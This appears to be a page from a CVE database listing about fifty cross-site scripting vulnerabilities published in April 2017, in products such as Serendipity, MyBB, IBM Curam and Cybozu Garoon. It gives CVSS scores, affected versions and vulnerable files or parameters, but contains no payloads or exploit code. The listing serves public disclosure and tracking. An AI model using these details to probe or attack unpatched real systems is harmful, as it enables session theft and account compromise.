Search
Total
13741 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2017-8102 | 1 S9y | 1 Serendipity | 2017-04-28 | 3.5 LOW | 5.4 MEDIUM |
| Stored XSS in Serendipity v2.1-rc1 allows an attacker to steal an admin's cookie and other information by composing a new entry as an editor user. This is related to lack of the serendipity_event_xsstrust plugin and a set_config error in that plugin. | |||||
| CVE-2017-7944 | 1 Xoops | 1 Xoops | 2017-04-27 | 4.3 MEDIUM | 6.1 MEDIUM |
| XOOPS Core 2.5.8.1 has XSS due to unescaped HTML output of an Install DB failure error message in page_dbsettings.php. | |||||
| CVE-2017-8103 | 1 Mybb | 1 Mybb | 2017-04-27 | 4.3 MEDIUM | 6.1 MEDIUM |
| In MyBB before 1.8.11, the Email MyCode component allows XSS, as demonstrated by an onmouseover event. | |||||
| CVE-2017-7992 | 1 Heartland Payment Systems | 1 Heartland-php | 2017-04-27 | 4.3 MEDIUM | 6.1 MEDIUM |
| Heartland Payment Systems Payment Gateway PHP SDK hps/heartland-php v2.8.17 is vulnerable to a reflected XSS in examples/consumer-authentication/cruise.php via the URI, as demonstrated by the cavv parameter. | |||||
| CVE-2016-9980 | 1 Ibm | 1 Curam Social Program Management | 2017-04-27 | 3.5 LOW | 5.4 MEDIUM |
| IBM Curam Social Program Management 5.2, 6.0, and 7.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 120256. | |||||
| CVE-2016-9979 | 1 Ibm | 1 Curam Social Program Management | 2017-04-27 | 3.5 LOW | 5.4 MEDIUM |
| IBM Curam Social Program Management 5.2, 6.0, and 7.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 120255. | |||||
| CVE-2017-8052 | 1 Craftcms | 1 Craft Cms | 2017-04-26 | 4.3 MEDIUM | 6.1 MEDIUM |
| Craft CMS before 2.6.2974 allows XSS attacks. | |||||
| CVE-2017-5183 | 1 Netiq | 1 Access Manager | 2017-04-26 | 4.3 MEDIUM | 6.1 MEDIUM |
| NetIQ Access Manager 4.2.2 and 4.3.x before 4.3.1+, when configured as an Identity Server, has XSS in the AssertionConsumerServiceURL field of a signed AuthnRequest in a samlp:AuthnRequest document. | |||||
| CVE-2016-4847 | 1 Ossec | 1 Web Ui | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| Cross-site scripting (XSS) vulnerability in site/search.php in OSSEC Web UI before 0.9 allows remote attackers to inject arbitrary web script or HTML by leveraging an unanchored regex. | |||||
| CVE-2016-4849 | 1 Geeklog Project | 1 Geeklog | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| Multiple cross-site scripting (XSS) vulnerabilities in Geeklog IVYWE edition 2.1.1 allow remote attackers to inject arbitrary web script or HTML by leveraging use of the COM_getCurrentURL function in (1) public_html/layout/default/header.thtml, (2) public_html/layout/bento/header.thtml, (3) public_html/layout/fotos/header.thtml, or (4) public_html/layout/default/article/article.thtml. | |||||
| CVE-2016-6347 | 1 Redhat | 1 Resteasy | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| Cross-site scripting (XSS) vulnerability in the default exception handler in RESTEasy allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. | |||||
| CVE-2017-7891 | 1 Sourcebans-pp Project | 1 Sourcebans-pp | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| sourcebans-pp (SourceBans++) 1.5.4.7 has XSS in admin.comms.php via the rebanid parameter. | |||||
| CVE-2016-1217 | 1 Cybozu | 1 Garoon | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| Cross-site scripting (XSS) vulnerability in the "Check available times" function in Cybozu Garoon before 4.2.2. | |||||
| CVE-2016-1214 | 1 Cybozu | 1 Garoon | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| Cross-site scripting (XSS) vulnerability in the "Response request" function in Cybozu Garoon before 4.2.2. | |||||
| CVE-2016-1215 | 1 Cybozu | 1 Garoon | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| Cross-site scripting (XSS) vulnerability in the "User details" function in Cybozu Garoon before 4.2.2. | |||||
| CVE-2016-1216 | 1 Cybozu | 1 Garoon | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| Cross-site scripting (XSS) vulnerability in the "New appointment" function in Cybozu Garoon before 4.2.2. | |||||
| CVE-2017-7896 | 1 Trendmicro | 1 Interscan Messaging Security Virtual Appliance | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 before CP 1644 has XSS. | |||||
| CVE-2017-7871 | 1 Tdm Project | 1 Tdm | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| trollepierre/tdm before 2017-04-13 is vulnerable to a reflected XSS in tdm-master/webhook.php (challenge parameter). | |||||
| CVE-2015-8256 | 1 Axis | 11 Cannon Network Camera, Explosion-protected Camera, Fixed Box Camera and 8 more | 2017-04-25 | 4.3 MEDIUM | 6.1 MEDIUM |
| Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras. | |||||
| CVE-2017-1160 | 1 Ibm | 1 Financial Transaction Manager | 2017-04-25 | 3.5 LOW | 5.4 MEDIUM |
| IBM Financial Transaction Manager for ACH Services for Multi-Platform 3.0.0.x is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 122892. | |||||
| CVE-2016-4875 | 3 Assist Project, Databox Project, Userbox Project | 3 Assist Plugin, Databox Plugin, Userbox Plugin | 2017-04-21 | 4.3 MEDIUM | 6.1 MEDIUM |
| Multiple cross-site scripting (XSS) vulnerabilities in the IVYWE (1) Assist plugin before 1.1.2.test20160906, (2) dataBox plugin before 0.0.0.20160906, and (3) userBox plugin before 0.0.0.20160906 for Geeklog allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. | |||||
| CVE-2016-3038 | 1 Ibm | 1 Cognos Business Intelligence | 2017-04-21 | 3.5 LOW | 5.4 MEDIUM |
| IBM Cognos TM1 10.1 and 10.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 114614. | |||||
| CVE-2017-0195 | 1 Microsoft | 5 Excel Web App, Office Online Server, Office Web Apps and 2 more | 2017-04-20 | 3.5 LOW | 5.4 MEDIUM |
| Microsoft Excel Services on Microsoft SharePoint Server 2010 SP1 and SP2, Microsoft Excel Web Apps 2010 SP2, Microsoft Office Web Apps 2010 SP2, Microsoft Office Web Apps Server 2013 SP1 and Office Online Server allows remote attackers to perform cross-site scripting and run script with local user privileges via a crafted request, aka "Microsoft Office XSS Elevation of Privilege Vulnerability." | |||||
| CVE-2016-8927 | 1 Ibm | 1 Tivoli Application Dependency Discovery Manager | 2017-04-20 | 3.5 LOW | 5.4 MEDIUM |
| IBM Tivoli Application Dependency Discovery Manager 7.2.2 and 7.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 118540. | |||||
| CVE-2014-3887 | 1 Iodata | 2 Rockdisk, Rockdisk Firmware | 2017-04-20 | 3.5 LOW | 5.4 MEDIUM |
| Cross-site scripting (XSS) vulnerability in I-O DATA DEVICE RockDisk with firmware before 1.05e1-2.0.5 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. NOTE: This vulnerability exists because of an incomplete fix for CVE-2013-4713. | |||||
| CVE-2017-7626 | 1 Smart Related Articles Project | 1 Smart Related Articles | 2017-04-20 | 4.3 MEDIUM | 6.1 MEDIUM |
| The "Smart related articles" extension 1.1 for Joomla! has XSS in dialog.php (n_art,type in GET Method). | |||||
| CVE-2015-7562 | 1 Teampass | 1 Teampass | 2017-04-20 | 4.3 MEDIUM | 6.1 MEDIUM |
| Multiple cross-site scripting (XSS) vulnerabilities in TeamPass 2.1.24 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) label value of an item or (2) name of a role. | |||||
| CVE-2016-8719 | 1 Moxa | 2 Awk-3131a, Awk-3131a Firmware | 2017-04-20 | 4.3 MEDIUM | 6.1 MEDIUM |
| An exploitable reflected Cross-Site Scripting vulnerability exists in the Web Application functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. Specially crafted input, in multiple parameters, can cause a malicious scripts to be executed by a victim. | |||||
| CVE-2016-1179 | 1 Appleple | 1 A-blog Cms | 2017-04-20 | 4.3 MEDIUM | 6.1 MEDIUM |
| Cross-site scripting (XSS) vulnerability in the standard template of the comment functionality in appleple a-blog cms 2.6.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML. | |||||
| CVE-2016-4897 | 1 Webmin | 1 Usermin | 2017-04-19 | 4.3 MEDIUM | 6.1 MEDIUM |
| Multiple cross-site scripting (XSS) vulnerabilities in (1) filter/save_forward.cgi, (2) filter/save.cgi, (3) /man/search.cgi in Usermin before 1.690. | |||||
| CVE-2016-2104 | 1 Redhat | 1 Satellite | 2017-04-19 | 4.3 MEDIUM | 6.1 MEDIUM |
| Multiple cross-site scripting (XSS) vulnerabilities in Red Hat Satellite 5 allow remote attackers to inject arbitrary web script or HTML via (1) the label parameter to admin/BunchDetail.do; (2) the package_name, (3) search_subscribed_channels, or (4) channel_filter parameter to software/packages/NameOverview.do; or unspecified vectors related to (5) <input:hidden> or (6) <bean:message> tags. | |||||
| CVE-2016-6348 | 1 Redhat | 1 Resteasy | 2017-04-19 | 4.3 MEDIUM | 6.1 MEDIUM |
| JacksonJsonpInterceptor in RESTEasy might allow remote attackers to conduct a cross-site script inclusion (XSSI) attack. | |||||
| CVE-2017-3125 | 1 Fortinet | 1 Fortimail | 2017-04-18 | 4.3 MEDIUM | 6.1 MEDIUM |
| An unauthenticated XSS vulnerability with FortiMail 5.0.0 - 5.2.9 and 5.3.0 - 5.3.8 could allow an attacker to execute arbitrary scripts in the security context of the browser of a victim logged in FortiMail, assuming the victim is social engineered into clicking an URL crafted by the attacker. | |||||
| CVE-2017-7621 | 1 Auromeera | 1 Emli | 2017-04-17 | 4.3 MEDIUM | 6.1 MEDIUM |
| Cross Site Scripting Vulnerability in core-eMLi in AuroMeera Technometrix Pvt. Ltd. eMLi V1.0 allows an Attacker to send malicious code, generally in the form of a browser-side script, to a different end user via the page parameter to code/student_portal/home.php. The affected versions are eMLi School Management 1.0, eMLi College Campus Management 1.0, and eMLi University Management 1.0. | |||||
| CVE-2016-5055 | 1 Osram | 1 Lightify Pro | 2017-04-14 | 4.3 MEDIUM | 6.1 MEDIUM |
| OSRAM SYLVANIA Osram Lightify Pro before 2016-07-26 has XSS in the username field and Wireless Client Mode configuration page. | |||||
| CVE-2016-5642 | 1 Opmantek | 1 Network Management Information System | 2017-04-14 | 3.5 LOW | 5.4 MEDIUM |
| Opmantek NMIS before 8.5.12G has XSS via SNMP. | |||||
| CVE-2016-5077 | 1 Netikus | 1 Eventsentry | 2017-04-14 | 4.3 MEDIUM | 6.1 MEDIUM |
| Netikus EventSentry before 3.2.1.44 has XSS via SNMP. | |||||
| CVE-2015-6021 | 1 Spiceworks | 1 Desktop | 2017-04-14 | 4.3 MEDIUM | 6.1 MEDIUM |
| Spiceworks Desktop before 2015-12-01 has XSS via an SNMP response. | |||||
| CVE-2015-2883 | 1 Philips | 1 In.sight B120\\37 | 2017-04-14 | 3.5 LOW | 5.4 MEDIUM |
| Philips In.Sight B120/37 has XSS, related to the Weaved cloud web service, as demonstrated by the name parameter to deviceSettings.php or shareDevice.php. | |||||
| CVE-2015-7275 | 1 Dell | 4 Integrated Remote Access Controller 6, Integrated Remote Access Controller 7, Integrated Remote Access Controller 8 and 1 more | 2017-04-14 | 4.3 MEDIUM | 6.1 MEDIUM |
| Dell Integrated Remote Access Controller (iDRAC) 6 before 2.85 and 7/8 before 2.30.30.30 has XSS. | |||||
| CVE-2016-5075 | 1 Cloudviewnms | 1 Cloudview Nms | 2017-04-14 | 4.3 MEDIUM | 6.1 MEDIUM |
| CloudView NMS before 2.10a has XSS via a TELNET login. | |||||
| CVE-2016-5073 | 1 Cloudviewnms | 1 Cloudview Nms | 2017-04-14 | 4.3 MEDIUM | 6.1 MEDIUM |
| CloudView NMS before 2.10a has XSS via SNMP. | |||||
| CVE-2015-6035 | 1 Opsview | 1 Opsview | 2017-04-13 | 4.3 MEDIUM | 6.1 MEDIUM |
| Opsview before 2015-11-06 has XSS via SNMP. | |||||
| CVE-2017-7591 | 1 Openidm Project | 1 Openidm | 2017-04-13 | 4.3 MEDIUM | 6.1 MEDIUM |
| OpenIDM through 4.0.0 and 4.5.0 is vulnerable to reflected cross-site scripting (XSS) attacks within the Admin UI, as demonstrated by the _sortKeys parameter to the authzRoles script under managed/user/. | |||||
| CVE-2017-7579 | 1 Phpmyfaq | 1 Phpmyfaq | 2017-04-12 | 4.3 MEDIUM | 6.1 MEDIUM |
| inc/PMF/Faq.php in phpMyFAQ before 2.9.7 has XSS in the question field. | |||||
| CVE-2015-4673 | 1 Clip-bucket | 1 Clipbucket | 2017-04-12 | 3.5 LOW | 5.4 MEDIUM |
| Multiple cross-site scripting (XSS) vulnerabilities in ClipBucket 2.7.0.5 allow remote authenticated users to inject arbitrary web script or HTML via (1) the collection_description parameter to upload/manage_collections.php in an add_new action or the (2) photo_description, (3) photo_tags, or (4) photo_title parameter to upload/actions/photo_uploader.php. | |||||
| CVE-2016-1000307 | 1 Clip-bucket | 1 Clipbucket | 2017-04-12 | 4.3 MEDIUM | 6.1 MEDIUM |
| Multiple Cross Site Scripting (XSS) Vulnerabilities in ClipBucket v2.8.1 and probably prior allow Remote Attackers to inject arbitrary web script or HTML via (1) profile_desc, about_me, schools, occupation, companies, hobbies, fav_movies, fav_music, fav_books parameters to ProfileSettings page; (2) note parameter to PersonalNotes Section; (3) closed_msg, description, allowed_types parameters to WebsiteConfigurations Section. NOTE: the collection_description vector is already covered by CVE-2015-4673. | |||||
| CVE-2017-6340 | 1 Trendmicro | 1 Interscan Web Security Virtual Appliance | 2017-04-11 | 3.5 LOW | 5.4 MEDIUM |
| Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 before CP 1746 does not sanitize a rest/commonlog/report/template name field, which allows a 'Reports Only' user to inject malicious JavaScript while creating a new report. Additionally, IWSVA implements incorrect access control that allows any authenticated, remote user (even with low privileges like 'Auditor') to create or modify reports, and consequently take advantage of this XSS vulnerability. The JavaScript is executed when victims visit reports or auditlog pages. | |||||
| CVE-2016-5061 | 1 Aternity | 1 Aternity | 2017-04-10 | 4.3 MEDIUM | 6.1 MEDIUM |
| Multiple cross-site scripting (XSS) vulnerabilities in the web server in Aternity before 9.0.1 allow remote attackers to inject arbitrary web script or HTML via the (1) HTTPAgent, (2) MacAgent, (3) getExternalURL, or (4) retrieveTrustedUrl page. | |||||
| CVE-2017-7215 | 1 Misp Project | 1 Misp | 2017-04-07 | 4.3 MEDIUM | 6.1 MEDIUM |
| Cross site scripting in some view elements in the index filter tool in app/webroot/js/misp2.4.68.js and the organisation landing page in app/View/Organisations/ajax/landingpage.ctp of MISP before 2.4.69 allows remote attackers to inject arbitrary web script or HTML. | |||||